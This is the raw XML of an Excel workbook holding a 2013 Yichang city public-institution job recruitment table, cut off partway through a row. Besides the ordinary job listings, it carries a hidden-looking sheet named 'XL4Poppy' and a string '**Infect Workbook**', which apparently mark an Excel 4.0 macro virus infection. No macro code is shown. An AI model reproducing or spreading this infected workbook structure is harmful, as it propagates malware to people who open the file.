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145" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="2013年（上半年）宜昌市事业单位公开招聘工作人员岗位表" sheetId="1" r:id="rId1"/>
    <sheet name="XL4Poppy" sheetId="2" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Print_Titles" localSheetId="0">'2013年（上半年）宜昌市事业单位公开招聘工作人员岗位表'!$2:$2</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="254" uniqueCount="179">
  <si>
    <t>主管部门</t>
  </si>
  <si>
    <t>招聘人数</t>
  </si>
  <si>
    <t>学 历</t>
  </si>
  <si>
    <t>所学专业</t>
  </si>
  <si>
    <t>其它条件</t>
  </si>
  <si>
    <t>报名咨询电话</t>
  </si>
  <si>
    <t>**Infect Workbook**</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t>岗位名称</t>
  </si>
  <si>
    <t>年 龄</t>
  </si>
  <si>
    <t>2013年（下半年）宜昌市直事业单位公开招聘工作人员岗位及职数表</t>
  </si>
  <si>
    <t>水利水电工程、农业水利、水文水资源</t>
  </si>
  <si>
    <t>水资源管理</t>
  </si>
  <si>
    <t>30周岁以下</t>
  </si>
  <si>
    <t>本科及以上</t>
  </si>
  <si>
    <t>水文水资源及相近专业</t>
  </si>
  <si>
    <t>水利工程运行维护</t>
  </si>
  <si>
    <t>水利水电工程、农业水利</t>
  </si>
  <si>
    <t>水利信息化管理</t>
  </si>
  <si>
    <t>40周岁以下</t>
  </si>
  <si>
    <t>计算机、电气自动化</t>
  </si>
  <si>
    <t>水利信息化运行维护</t>
  </si>
  <si>
    <t>35周岁以下</t>
  </si>
  <si>
    <t>计算机、发电厂及电力系统、电气自动化</t>
  </si>
  <si>
    <t>财会及相近专业</t>
  </si>
  <si>
    <t>文秘</t>
  </si>
  <si>
    <t>新闻、法律</t>
  </si>
  <si>
    <t>水利工程管理</t>
  </si>
  <si>
    <t>30周岁以下</t>
  </si>
  <si>
    <t>本科及以上</t>
  </si>
  <si>
    <t>0717-6313620   0717-6313602</t>
  </si>
  <si>
    <t>宜昌仲裁委员会</t>
  </si>
  <si>
    <t>宜昌仲裁委员会办公室</t>
  </si>
  <si>
    <t>办案秘书</t>
  </si>
  <si>
    <t>具有民商事仲裁工作经历2年以上</t>
  </si>
  <si>
    <t>宜昌市文化局</t>
  </si>
  <si>
    <t>宜昌市文化市场综合执法支队</t>
  </si>
  <si>
    <t>网络管理</t>
  </si>
  <si>
    <t>30周岁以下</t>
  </si>
  <si>
    <t>信息管理与信息系统、电子信息工程、电子信息科学与技术</t>
  </si>
  <si>
    <t>宜昌市林业局</t>
  </si>
  <si>
    <t>林业科研推广</t>
  </si>
  <si>
    <t>28周岁以下</t>
  </si>
  <si>
    <t>林学、园林设计（园艺）、森保（植保）及相关专业</t>
  </si>
  <si>
    <t>适应艰苦环境工作</t>
  </si>
  <si>
    <t>财会、经管及相关专业</t>
  </si>
  <si>
    <t>0717-7780252 13872652802</t>
  </si>
  <si>
    <t>大老岭自然保护区管理局</t>
  </si>
  <si>
    <t>林业工程管理</t>
  </si>
  <si>
    <t>林学、野保、森林培育及相关专业</t>
  </si>
  <si>
    <t>适应高寒地区工作</t>
  </si>
  <si>
    <t>0717-6223838</t>
  </si>
  <si>
    <t>森林植物检疫</t>
  </si>
  <si>
    <t>0717-6928721 13872610596</t>
  </si>
  <si>
    <t>林业调查规划设计</t>
  </si>
  <si>
    <t>林学相关专业</t>
  </si>
  <si>
    <t>0717-6241525</t>
  </si>
  <si>
    <t>宜昌市城市管理局</t>
  </si>
  <si>
    <t>宜昌市城市管理监督指挥中心</t>
  </si>
  <si>
    <t>办公室文员</t>
  </si>
  <si>
    <t>信息技术</t>
  </si>
  <si>
    <t>统计分析</t>
  </si>
  <si>
    <t>林学、植物检疫学、生物化学、分子生物学及相关专业</t>
  </si>
  <si>
    <t>中国语言文学、政治学</t>
  </si>
  <si>
    <t>计算机技术及应用类</t>
  </si>
  <si>
    <t>统计学类</t>
  </si>
  <si>
    <t>宜昌三峡旅游度假区管理委员会</t>
  </si>
  <si>
    <t>宜昌市桃花村景区管理处</t>
  </si>
  <si>
    <t>综合管理</t>
  </si>
  <si>
    <t>工艺美术、艺术设计、风景园林</t>
  </si>
  <si>
    <t>0717-6253352 0717-6253369</t>
  </si>
  <si>
    <t>宜昌市房产管理局</t>
  </si>
  <si>
    <t>工程管理</t>
  </si>
  <si>
    <t>财务管理</t>
  </si>
  <si>
    <t>40周岁以下</t>
  </si>
  <si>
    <t>35周岁以下</t>
  </si>
  <si>
    <t>专业不限</t>
  </si>
  <si>
    <t>工程类专业</t>
  </si>
  <si>
    <t>具有2年以上房地产开发工作经历</t>
  </si>
  <si>
    <t>0717-6367999 0717-6748759</t>
  </si>
  <si>
    <t>宜昌市安置房建设管理处</t>
  </si>
  <si>
    <t>宜昌市体育局</t>
  </si>
  <si>
    <t>宜昌市体育运动学校</t>
  </si>
  <si>
    <t>体育专业教练</t>
  </si>
  <si>
    <t>专业不限</t>
  </si>
  <si>
    <t>0717-6923601</t>
  </si>
  <si>
    <t>教师</t>
  </si>
  <si>
    <t>运动人体科学、运动医学</t>
  </si>
  <si>
    <t>宜昌市体育中心</t>
  </si>
  <si>
    <t>0717-6458415</t>
  </si>
  <si>
    <t>宜昌市规划局</t>
  </si>
  <si>
    <t>规划编制</t>
  </si>
  <si>
    <t>35周岁以下</t>
  </si>
  <si>
    <t>规划审批</t>
  </si>
  <si>
    <t>规划管理</t>
  </si>
  <si>
    <t>规划监督</t>
  </si>
  <si>
    <t>测绘管理</t>
  </si>
  <si>
    <t>城市规划、建筑学、土木工程、给水排水工程、景观建筑设计、建筑工程、市政工程、交通工程、风景园林、资源环境与城乡规划管理、经济地理学与城乡区域规划、人文地理学。</t>
  </si>
  <si>
    <t>0717-6323500</t>
  </si>
  <si>
    <t>规划监督</t>
  </si>
  <si>
    <t>测绘科学与技术类</t>
  </si>
  <si>
    <t>0717-6323500</t>
  </si>
  <si>
    <t>全日制普通高校本科及以上</t>
  </si>
  <si>
    <t>水电工程</t>
  </si>
  <si>
    <t>体育科研医务</t>
  </si>
  <si>
    <t>宜昌市东风渠灌区管理局</t>
  </si>
  <si>
    <t>宜昌市水利水电局</t>
  </si>
  <si>
    <t>宜昌市森林病虫防治检疫站</t>
  </si>
  <si>
    <t>宜昌市林业调查规划设计院</t>
  </si>
  <si>
    <t>宜昌市规划局高新区分局</t>
  </si>
  <si>
    <t>宜昌市规划局猇亭分局</t>
  </si>
  <si>
    <t>宜昌市民政局</t>
  </si>
  <si>
    <t>宜昌市烈士陵园</t>
  </si>
  <si>
    <t>宜昌市儿童福利院</t>
  </si>
  <si>
    <t>宜昌市第二社会福利院</t>
  </si>
  <si>
    <t>财会</t>
  </si>
  <si>
    <t>临床医疗</t>
  </si>
  <si>
    <t>残疾儿童康复治疗技术</t>
  </si>
  <si>
    <t>护士</t>
  </si>
  <si>
    <t>保育员</t>
  </si>
  <si>
    <t>财会</t>
  </si>
  <si>
    <t>管理</t>
  </si>
  <si>
    <t>本科及以上</t>
  </si>
  <si>
    <t>30周岁以下</t>
  </si>
  <si>
    <t>40周岁以下</t>
  </si>
  <si>
    <t>具有护士执业资格证书，有2年以上实际工作经历</t>
  </si>
  <si>
    <t>具有医师资格证及执业证，有2年以上实际工作经历</t>
  </si>
  <si>
    <t>0717-6900737</t>
  </si>
  <si>
    <t>0717-6241737</t>
  </si>
  <si>
    <t>0717-6440203</t>
  </si>
  <si>
    <t>0717-6834118</t>
  </si>
  <si>
    <t>0717-4326116</t>
  </si>
  <si>
    <t>取得会计执业资格证书，具有2年以上实际工作经历</t>
  </si>
  <si>
    <t>汉语言文学、社会工作、计算机应用技术、机电一体化技术及管理类专业</t>
  </si>
  <si>
    <t>具有2年以上实际工作经历</t>
  </si>
  <si>
    <t>具有医师资格证及执业证</t>
  </si>
  <si>
    <t>专业不限</t>
  </si>
  <si>
    <t>具有学士及以上学位</t>
  </si>
  <si>
    <t>具有工程师及以上专业技术资格</t>
  </si>
  <si>
    <t>数学、物理</t>
  </si>
  <si>
    <t>电气自动化</t>
  </si>
  <si>
    <t>具有会计执业资格证书</t>
  </si>
  <si>
    <t>财会或经济类专业</t>
  </si>
  <si>
    <t>儿科、内科</t>
  </si>
  <si>
    <t>康复治疗技术</t>
  </si>
  <si>
    <t>护理</t>
  </si>
  <si>
    <t>临床医学</t>
  </si>
  <si>
    <t>财务管理、会计学、计算机科学与技术</t>
  </si>
  <si>
    <t>园林、园艺、林学</t>
  </si>
  <si>
    <t>园林绿化</t>
  </si>
  <si>
    <t>财会</t>
  </si>
  <si>
    <t>三峡植物园</t>
  </si>
  <si>
    <t>具有会计执业资格证书</t>
  </si>
  <si>
    <t>具有会计证和学士及以上学位</t>
  </si>
  <si>
    <t>大专及以上</t>
  </si>
  <si>
    <t>大专及以上</t>
  </si>
  <si>
    <t>大专及以上</t>
  </si>
  <si>
    <t>本科及以上</t>
  </si>
  <si>
    <t>大专及以上</t>
  </si>
  <si>
    <t>持有C1以上驾照</t>
  </si>
  <si>
    <t>具有1年以上康复工作经历</t>
  </si>
  <si>
    <t>具有执业资格的女性护士</t>
  </si>
  <si>
    <t>具有在社会福利机构工作经历的女性保育员</t>
  </si>
  <si>
    <t>研究生</t>
  </si>
  <si>
    <t>招聘单位</t>
  </si>
  <si>
    <t>具备在体育科研岗位1年以上工作经历。（注：在岗位职数与报考人数比例为1:2）</t>
  </si>
  <si>
    <t>注：一、留学生须提供国家教育部留学生服务中心出具的学历认证书；</t>
  </si>
  <si>
    <t xml:space="preserve">    二、“本科及以上”学历包括专升本，“全日制普通高校本科以上”不包括专升本。</t>
  </si>
  <si>
    <t>游泳、跆拳道、摔跤、女子篮球、水上项目（皮划艇、赛艇）、乒乓球、足球</t>
  </si>
  <si>
    <t>具有教练员资格许可证，且有2年以上执教经验（执教地市级及以上运动队）。（注：岗位职数与报考人数比例为1:2）</t>
  </si>
  <si>
    <t>具有教师资格证书</t>
  </si>
  <si>
    <t>持有高压电工进网作业许可证及电工四级/中级技能职业资格证书</t>
  </si>
  <si>
    <t>办公室文秘</t>
  </si>
  <si>
    <t>房地产前期策划</t>
  </si>
  <si>
    <t>财务管理专业或计算机科学与技术专业</t>
  </si>
  <si>
    <t>熟悉办公软件操作，且有2年以上房地产开发工作经历</t>
  </si>
  <si>
    <t>具有《会计从业资格证书》，且有2年以上财务管理工作经历</t>
  </si>
  <si>
    <t>具有学士及以上学位和2年以上工作经历</t>
  </si>
  <si>
    <t>具有助理工程师及以上职称，且有2年以上建筑工程管理工作经历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</si>
</sst>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0.75390625" style="1" customWidth="1"/>
    <col min="2" max="2" width="13.125" style="1" customWidth="1"/>
    <col min="3" max="3" width="11.125" style="1" customWidth="1"/>
    <col min="4" max="4" width="5.375" style="1" customWidth="1"/>
    <col min="5" max="5" width="10.375" style="0" customWidth="1"/>
    <col min="6" max="6" width="12.875" style="0" customWidth="1"/>
    <col min="7" max="7" width="28.875" style="0" customWidth="1"/>
    <col min="8" max="8" width="26.125" style="9" customWidth="1"/>
    <col min="9" max="9" width="12.125" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="31.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26.25" customHeight="1">
      <c r="A2" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>164</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>1</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>2</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>3</v>
      </c>
      <c r="H2" s="2" t="s">
        <v>4</v>
      </c>
      <c r="I2" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:9" s="10" customFormat="1" ht="24">
      <c r="A3" s="18" t="s">
        <v>106</v>
      </c>
      <c r="B3" s="18" t="s">
        <v>105</v>
      </c>
      <c r="C3" s="6" t="s">
        <v>27</v>
      </c>
      <c r="D3" s="6">
        <v>2</v>
      </c>
      <c r="E3" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F3" s="6" t="s">
        <v>29</v>
      </c>
      <c r="G3" s="6" t="s">
        <v>11</v>
      </c>
      <c r="H3" s="6" t="s">
        <v>137</v>
      </c>
      <c r="I3" s="18" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="4" spans="1:9" s="10" customFormat="1" ht="18.75" customHeight="1">
      <c r="A4" s="20"/>
      <c r="B4" s="20"/>
      <c r="C4" s="6" t="s">
        <v>12</v>
      </c>
      <c r="D4" s="6">
        <v>1</v>
      </c>
      <c r="E4" s="6" t="s">
        <v>13</v>
      </c>
      <c r="F4" s="6" t="s">
        <v>14</v>
      </c>
      <c r="G4" s="6" t="s">
        <v>15</v>
      </c>
      <c r="H4" s="6" t="s">
        <v>137</v>
      </c>
      <c r="I4" s="20"/>
    </row>
    <row r="5" spans="1:9" s="10" customFormat="1" ht="24">
      <c r="A5" s="20"/>
      <c r="B5" s="20"/>
      <c r="C5" s="6" t="s">
        <v>16</v>
      </c>
      <c r="D5" s="6">
        <v>1</v>
      </c>
      <c r="E5" s="6" t="s">
        <v>13</v>
      </c>
      <c r="F5" s="6" t="s">
        <v>154</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>17</v>
      </c>
      <c r="H5" s="6"/>
      <c r="I5" s="20"/>
    </row>
    <row r="6" spans="1:9" s="10" customFormat="1" ht="24">
      <c r="A6" s="20"/>
      <c r="B6" s="20"/>
      <c r="C6" s="6" t="s">
        <v>18</v>
      </c>
      <c r="D6" s="6">
        <v>1</v>
      </c>
      <c r="E6" s="6" t="s">
        <v>19</v>
      </c>
      <c r="F6" s="6" t="s">
        <v>14</v>
      </c>
      <c r="G6" s="6" t="s">
        <v>20</v>
      </c>
      <c r="H6" s="6" t="s">
        <v>138</v>
      </c>
      <c r="I6" s="20"/>
    </row>
    <row r="7" spans="1:9" s="10" customFormat="1" ht="24">
      <c r="A7" s="20"/>
      <c r="B7" s="20"/>
      <c r="C7" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D7" s="6">
        <v>1</v>
      </c>
      <c r="E7" s="6" t="s">
        <v>22</v>
      </c>
      <c r="F7" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G7" s="6" t="s">
        <v>23</v>
      </c>
      <c r="H7" s="6"/>
      <c r="I7" s="20"/>
    </row>
    <row r="8" spans="1:9" s="10" customFormat="1" ht="18.75" customHeight="1">
      <c r="A8" s="20"/>
      <c r="B8" s="20"/>
      <c r="C8" s="6" t="s">
        <v>150</v>
      </c>
      <c r="D8" s="6">
        <v>2</v>
      </c>
      <c r="E8" s="6" t="s">
        <v>13</v>
      </c>
      <c r="F8" s="6" t="s">
        <v>14</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>24</v>
      </c>
      <c r="H8" s="6" t="s">
        <v>153</v>
      </c>
      <c r="I8" s="20"/>
    </row>
    <row r="9" spans="1:9" s="10" customFormat="1" ht="18" customHeight="1">
      <c r="A9" s="19"/>
      <c r="B9" s="19"/>
      <c r="C9" s="6" t="s">
        <v>25</v>
      </c>
      <c r="D9" s="6">
        <v>1</v>
      </c>
      <c r="E9" s="6" t="s">
        <v>13</v>
      </c>
      <c r="F9" s="6" t="s">
        <v>156</v>
      </c>
      <c r="G9" s="6" t="s">
        <v>26</v>
      </c>
      <c r="H9" s="6"/>
      <c r="I9" s="19"/>
    </row>
    <row r="10" spans="1:9" s="10" customFormat="1" ht="26.25" customHeight="1">
      <c r="A10" s="11" t="s">
        <v>31</v>
      </c>
      <c r="B10" s="11" t="s">
        <v>32</v>
      </c>
      <c r="C10" s="6" t="s">
        <v>33</v>
      </c>
      <c r="D10" s="6">
        <v>2</v>
      </c>
      <c r="E10" s="6" t="s">
        <v>74</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G10" s="6" t="s">
        <v>84</v>
      </c>
      <c r="H10" s="6" t="s">
        <v>34</v>
      </c>
      <c r="I10" s="11" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="11" spans="1:9" s="10" customFormat="1" ht="26.25" customHeight="1">
      <c r="A11" s="11" t="s">
        <v>35</v>
      </c>
      <c r="B11" s="11" t="s">
        <v>36</v>
      </c>
      <c r="C11" s="6" t="s">
        <v>37</v>
      </c>
      <c r="D11" s="6">
        <v>1</v>
      </c>
      <c r="E11" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F11" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G11" s="6" t="s">
        <v>39</v>
      </c>
      <c r="H11" s="6"/>
      <c r="I11" s="11" t="s">
        <v>128</v>
      </c>
    </row>
    <row r="12" spans="1:9" s="10" customFormat="1" ht="24" customHeight="1">
      <c r="A12" s="18" t="s">
        <v>40</v>
      </c>
      <c r="B12" s="18" t="s">
        <v>151</v>
      </c>
      <c r="C12" s="6" t="s">
        <v>41</v>
      </c>
      <c r="D12" s="6">
        <v>4</v>
      </c>
      <c r="E12" s="6" t="s">
        <v>42</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>157</v>
      </c>
      <c r="G12" s="6" t="s">
        <v>43</v>
      </c>
      <c r="H12" s="6" t="s">
        <v>44</v>
      </c>
      <c r="I12" s="18" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="13" spans="1:9" s="10" customFormat="1" ht="21" customHeight="1">
      <c r="A13" s="20"/>
      <c r="B13" s="19"/>
      <c r="C13" s="6" t="s">
        <v>120</v>
      </c>
      <c r="D13" s="6">
        <v>1</v>
      </c>
      <c r="E13" s="6" t="s">
        <v>42</v>
      </c>
      <c r="F13" s="6" t="s">
        <v>156</v>
      </c>
      <c r="G13" s="6" t="s">
        <v>45</v>
      </c>
      <c r="H13" s="11" t="s">
        <v>152</v>
      </c>
      <c r="I13" s="19"/>
    </row>
    <row r="14" spans="1:9" s="10" customFormat="1" ht="25.5" customHeight="1">
      <c r="A14" s="20"/>
      <c r="B14" s="11" t="s">
        <v>47</v>
      </c>
      <c r="C14" s="6" t="s">
        <v>48</v>
      </c>
      <c r="D14" s="6">
        <v>3</v>
      </c>
      <c r="E14" s="6" t="s">
        <v>42</v>
      </c>
      <c r="F14" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G14" s="6" t="s">
        <v>49</v>
      </c>
      <c r="H14" s="6" t="s">
        <v>50</v>
      </c>
      <c r="I14" s="11" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="15" spans="1:9" s="10" customFormat="1" ht="26.25" customHeight="1">
      <c r="A15" s="20"/>
      <c r="B15" s="11" t="s">
        <v>107</v>
      </c>
      <c r="C15" s="6" t="s">
        <v>52</v>
      </c>
      <c r="D15" s="6">
        <v>1</v>
      </c>
      <c r="E15" s="6" t="s">
        <v>42</v>
      </c>
      <c r="F15" s="6" t="s">
        <v>29</v>
      </c>
      <c r="G15" s="6" t="s">
        <v>62</v>
      </c>
      <c r="H15" s="6"/>
      <c r="I15" s="11" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="16" spans="1:9" s="10" customFormat="1" ht="26.25" customHeight="1">
      <c r="A16" s="19"/>
      <c r="B16" s="11" t="s">
        <v>108</v>
      </c>
      <c r="C16" s="6" t="s">
        <v>54</v>
      </c>
      <c r="D16" s="6">
        <v>2</v>
      </c>
      <c r="E16" s="6" t="s">
        <v>42</v>
      </c>
      <c r="F16" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G16" s="6" t="s">
        <v>55</v>
      </c>
      <c r="H16" s="6"/>
      <c r="I16" s="6" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="17" spans="1:9" s="10" customFormat="1" ht="38.25" customHeight="1">
      <c r="A17" s="6" t="s">
        <v>66</v>
      </c>
      <c r="B17" s="6" t="s">
        <v>67</v>
      </c>
      <c r="C17" s="6" t="s">
        <v>68</v>
      </c>
      <c r="D17" s="6">
        <v>1</v>
      </c>
      <c r="E17" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F17" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G17" s="6" t="s">
        <v>69</v>
      </c>
      <c r="H17" s="13" t="s">
        <v>177</v>
      </c>
      <c r="I17" s="11" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="18" spans="1:9" s="10" customFormat="1" ht="25.5" customHeight="1">
      <c r="A18" s="18" t="s">
        <v>57</v>
      </c>
      <c r="B18" s="18" t="s">
        <v>58</v>
      </c>
      <c r="C18" s="6" t="s">
        <v>59</v>
      </c>
      <c r="D18" s="6">
        <v>2</v>
      </c>
      <c r="E18" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F18" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G18" s="6" t="s">
        <v>63</v>
      </c>
      <c r="H18" s="6"/>
      <c r="I18" s="18" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="19" spans="1:9" s="10" customFormat="1" ht="24.75" customHeight="1">
      <c r="A19" s="20"/>
      <c r="B19" s="20"/>
      <c r="C19" s="6" t="s">
        <v>60</v>
      </c>
      <c r="D19" s="6">
        <v>1</v>
      </c>
      <c r="E19" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F19" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G19" s="6" t="s">
        <v>64</v>
      </c>
      <c r="H19" s="6"/>
      <c r="I19" s="20"/>
    </row>
    <row r="20" spans="1:9" s="10" customFormat="1" ht="24.75" customHeight="1">
      <c r="A20" s="19"/>
      <c r="B20" s="19"/>
      <c r="C20" s="6" t="s">
        <v>61</v>
      </c>
      <c r="D20" s="6">
        <v>1</v>
      </c>
      <c r="E20" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F20" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G20" s="6" t="s">
        <v>65</v>
      </c>
      <c r="H20" s="6"/>
      <c r="I20" s="19"/>
    </row>
    <row r="21" spans="1:9" s="10" customFormat="1" ht="47.25" customHeight="1">
      <c r="A21" s="18" t="s">
        <v>71</v>
      </c>
      <c r="B21" s="18" t="s">
        <v>80</v>
      </c>
      <c r="C21" s="6" t="s">
        <v>172</v>
      </c>
      <c r="D21" s="6">
        <v>1</v>
      </c>
      <c r="E21" s="6" t="s">
        <v>74</v>
      </c>
      <c r="F21" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G21" s="6" t="s">
        <v>76</v>
      </c>
      <c r="H21" s="13" t="s">
        <v>175</v>
      </c>
      <c r="I21" s="18" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="22" spans="1:9" s="10" customFormat="1" ht="47.25" customHeight="1">
      <c r="A22" s="20"/>
      <c r="B22" s="20"/>
      <c r="C22" s="6" t="s">
        <v>173</v>
      </c>
      <c r="D22" s="6">
        <v>1</v>
      </c>
      <c r="E22" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F22" s="6" t="s">
        <v>156</v>
      </c>
      <c r="G22" s="6" t="s">
        <v>76</v>
      </c>
      <c r="H22" s="13" t="s">
        <v>78</v>
      </c>
      <c r="I22" s="20"/>
    </row>
    <row r="23" spans="1:9" s="10" customFormat="1" ht="47.25" customHeight="1">
      <c r="A23" s="20"/>
      <c r="B23" s="20"/>
      <c r="C23" s="6" t="s">
        <v>72</v>
      </c>
      <c r="D23" s="6">
        <v>1</v>
      </c>
      <c r="E23" s="6" t="s">
        <v>75</v>
      </c>
      <c r="F23" s="6" t="s">
        <v>155</v>
      </c>
      <c r="G23" s="6" t="s">
        <v>77</v>
      </c>
      <c r="H23" s="13" t="s">
        <v>178</v>
      </c>
      <c r="I23" s="20"/>
    </row>
    <row r="24" spans="1:9" s="10" customFormat="1" ht="47.25" customHeight="1">
      <c r="A24" s="19"/>
      <c r="B24" s="19"/>
      <c r="C24" s="6" t="s">
        <v>73</v>
      </c>
      <c r="D24" s="6">
        <v>2</v>
      </c>
      <c r="E24" s="6" t="s">
        <v>75</v>
      </c>
      <c r="F24" s="6" t="s">
        <v>156</v>
      </c>
      <c r="G24" s="6" t="s">
        <v>174</v>
      </c>
      <c r="H24" s="13" t="s">
        <v>176</v>
      </c>
      <c r="I24" s="19"/>
    </row>
    <row r="25" spans="1:9" s="10" customFormat="1" ht="96.75" customHeight="1">
      <c r="A25" s="18" t="s">
        <v>81</v>
      </c>
      <c r="B25" s="18" t="s">
        <v>82</v>
      </c>
      <c r="C25" s="6" t="s">
        <v>83</v>
      </c>
      <c r="D25" s="6">
        <v>3</v>
      </c>
      <c r="E25" s="6" t="s">
        <v>74</v>
      </c>
      <c r="F25" s="6" t="s">
        <v>156</v>
      </c>
      <c r="G25" s="6" t="s">
        <v>168</v>
      </c>
      <c r="H25" s="13" t="s">
        <v>169</v>
      </c>
      <c r="I25" s="18" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="26" spans="1:9" s="10" customFormat="1" ht="75" customHeight="1">
      <c r="A26" s="20"/>
      <c r="B26" s="20"/>
      <c r="C26" s="6" t="s">
        <v>86</v>
      </c>
      <c r="D26" s="6">
        <v>1</v>
      </c>
      <c r="E26" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F26" s="6" t="s">
        <v>122</v>
      </c>
      <c r="G26" s="6" t="s">
        <v>139</v>
      </c>
      <c r="H26" s="13" t="s">
        <v>170</v>
      </c>
      <c r="I26" s="20"/>
    </row>
    <row r="27" spans="1:9" s="10" customFormat="1" ht="54.75" customHeight="1">
      <c r="A27" s="20"/>
      <c r="B27" s="19"/>
      <c r="C27" s="6" t="s">
        <v>104</v>
      </c>
      <c r="D27" s="6">
        <v>1</v>
      </c>
      <c r="E27" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F27" s="6" t="s">
        <v>163</v>
      </c>
      <c r="G27" s="6" t="s">
        <v>87</v>
      </c>
      <c r="H27" s="13" t="s">
        <v>165</v>
      </c>
      <c r="I27" s="19"/>
    </row>
    <row r="28" spans="1:9" s="10" customFormat="1" ht="45" customHeight="1">
      <c r="A28" s="19"/>
      <c r="B28" s="11" t="s">
        <v>88</v>
      </c>
      <c r="C28" s="6" t="s">
        <v>103</v>
      </c>
      <c r="D28" s="6">
        <v>1</v>
      </c>
      <c r="E28" s="6" t="s">
        <v>38</v>
      </c>
      <c r="F28" s="6" t="s">
        <v>156</v>
      </c>
      <c r="G28" s="6" t="s">
        <v>140</v>
      </c>
      <c r="H28" s="13" t="s">
        <v>171</v>
      </c>
      <c r="I28" s="11" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="29" spans="1:9" s="10" customFormat="1" ht="24.75" customHeight="1">
      <c r="A29" s="18" t="s">
        <v>90</v>
      </c>
      <c r="B29" s="18" t="s">
        <v>109</v>
      </c>
      <c r="C29" s="6" t="s">
        <v>91</v>
      </c>
      <c r="D29" s="6">
        <v>1</v>
      </c>
      <c r="E29" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F29" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G29" s="22" t="s">
        <v>97</v>
      </c>
      <c r="H29" s="25"/>
      <c r="I29" s="18" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="30" spans="1:9" s="10" customFormat="1" ht="24.75" customHeight="1">
      <c r="A30" s="20"/>
      <c r="B30" s="20"/>
      <c r="C30" s="6" t="s">
        <v>93</v>
      </c>
      <c r="D30" s="6">
        <v>1</v>
      </c>
      <c r="E30" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F30" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G30" s="23"/>
      <c r="H30" s="26"/>
      <c r="I30" s="20"/>
    </row>
    <row r="31" spans="1:9" s="10" customFormat="1" ht="24.75" customHeight="1">
      <c r="A31" s="20"/>
      <c r="B31" s="20"/>
      <c r="C31" s="6" t="s">
        <v>94</v>
      </c>
      <c r="D31" s="6">
        <v>1</v>
      </c>
      <c r="E31" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F31" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G31" s="23"/>
      <c r="H31" s="26"/>
      <c r="I31" s="20"/>
    </row>
    <row r="32" spans="1:9" s="10" customFormat="1" ht="24.75" customHeight="1">
      <c r="A32" s="20"/>
      <c r="B32" s="20"/>
      <c r="C32" s="6" t="s">
        <v>95</v>
      </c>
      <c r="D32" s="6">
        <v>1</v>
      </c>
      <c r="E32" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F32" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G32" s="24"/>
      <c r="H32" s="27"/>
      <c r="I32" s="20"/>
    </row>
    <row r="33" spans="1:9" s="10" customFormat="1" ht="26.25" customHeight="1">
      <c r="A33" s="20"/>
      <c r="B33" s="19"/>
      <c r="C33" s="6" t="s">
        <v>96</v>
      </c>
      <c r="D33" s="6">
        <v>1</v>
      </c>
      <c r="E33" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F33" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G33" s="6" t="s">
        <v>100</v>
      </c>
      <c r="H33" s="12"/>
      <c r="I33" s="19"/>
    </row>
    <row r="34" spans="1:9" s="10" customFormat="1" ht="30" customHeight="1">
      <c r="A34" s="20"/>
      <c r="B34" s="18" t="s">
        <v>110</v>
      </c>
      <c r="C34" s="6" t="s">
        <v>91</v>
      </c>
      <c r="D34" s="6">
        <v>1</v>
      </c>
      <c r="E34" s="6" t="s">
        <v>92</v>
      </c>
      <c r="F34" s="6" t="s">
        <v>102</v>
      </c>
      <c r="G34" s="18" t="s">
        <v>97</v>
      </c>
      <c r="H34" s="25"/>
      <c r="I34" s="18" t="s">
